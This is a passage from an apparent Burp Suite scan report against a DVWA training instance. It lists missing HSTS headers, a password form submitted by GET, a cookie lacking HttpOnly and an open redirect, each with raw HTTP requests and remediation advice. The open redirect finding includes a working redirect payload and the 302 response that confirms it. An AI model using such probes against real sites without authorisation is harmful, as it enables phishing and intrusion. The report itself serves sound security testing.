User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4211f230e7d91901f7f1c3880dd3aa6f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4193
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
9.44. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/low.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/open_redirect/source/low.php?redirect=info.php?id=1 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f24117d4e4d0b8e33bc943d70bd65e00
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
location: info.php?id=1
9.45. https://pentest-ground.com:4280/vulnerabilities/sqli/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/sqli/?id=946146&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e7fce7ed667134b8606e163d4a2a33b7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4064
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)</
...[SNIP]...
9.46. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli_blind/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=9f28fa18f337425afc9aa892e78d492e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
9.47. https://pentest-ground.com:4280/vulnerabilities/upload/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=30dfe41b65fb094cfbdac447e96119cd
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryecNMX27PWG2QSiwV
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundaryecNMX27PWG2QSiwV
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryecNMX27PWG2QSiwV
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:13 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
9.48. https://pentest-ground.com:4280/vulnerabilities/view_help.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_help.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/view_help.php?id=brute&security=low&locale=en HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3e80b2e1e73cd41e7284684082f1165
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:12 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4235
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
9.49. https://pentest-ground.com:4280/vulnerabilities/view_source.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/view_source.php?id=brute&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=0469bf99ed333ec9d4bed463704811d5
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 6531
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
9.50. https://pentest-ground.com:4280/vulnerabilities/weak_id/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/weak_id/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=816b74549ceec886dd90efed771fc842
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3427
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=1
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
9.51. https://pentest-ground.com:4280/vulnerabilities/xss_d/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_d/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/xss_d/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3b16130fb79125ad39c31a7a5f28589
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:18 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4612
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
9.52. https://pentest-ground.com:4280/vulnerabilities/xss_r/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_r/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/xss_r/?name=YIQlvlCg HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=7ad36719161235c3db9c483f4194ef00
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:35 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Reflected Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
9.53. https://pentest-ground.com:4280/vulnerabilities/xss_s/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=be26cfa0f1e58ad96599acf4fe963262
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQw&mtxMessage=RUYsQw&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4943
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
10. Password submitted using GET method
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/brute/ |
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:- https://pentest-ground.com:4280/vulnerabilities/brute/
The form contains the following password field:
Issue background
Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, applications should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Vulnerability classifications
Request 1
GET /vulnerabilities/brute/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=677b9b581720fa14a254ac46290cf902
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4153
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
</h2>
<form action="#" method="GET">
Username:<br />
...[SNIP]...
<br />
<input type="password" AUTOCOMPLETE="off" name="password"><br />
...[SNIP]...
11. Open redirection (reflected)
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/low.php |
Issue detail
The value of the redirect request parameter is used to perform an HTTP redirect. The payload http://a8ooxe1ox6p/a?info.php?id=1 was submitted in the redirect parameter. This caused a redirection to the following URL:- http://a8ooxe1ox6p/a?info.php?id=1
Issue background
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:
- Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
- Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
- The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
- The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
- The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/open_redirect/source/low.php?redirect=http%3a%2f%2fa8ooxe1ox6p%2fa%3finfo.php%3fid%3d1 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=5e3411f8f67c90094694a6b4d71df25c
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:48:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
location: http://a8ooxe1ox6p/a?info.php?id=1
12. Cookie without HttpOnly flag set
Previous
Next
There are 2 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure makes certain client-side attacks, such as cross-site scripting, slightly harder to exploit by preventing them from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
References
Vulnerability classifications
12.1. https://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
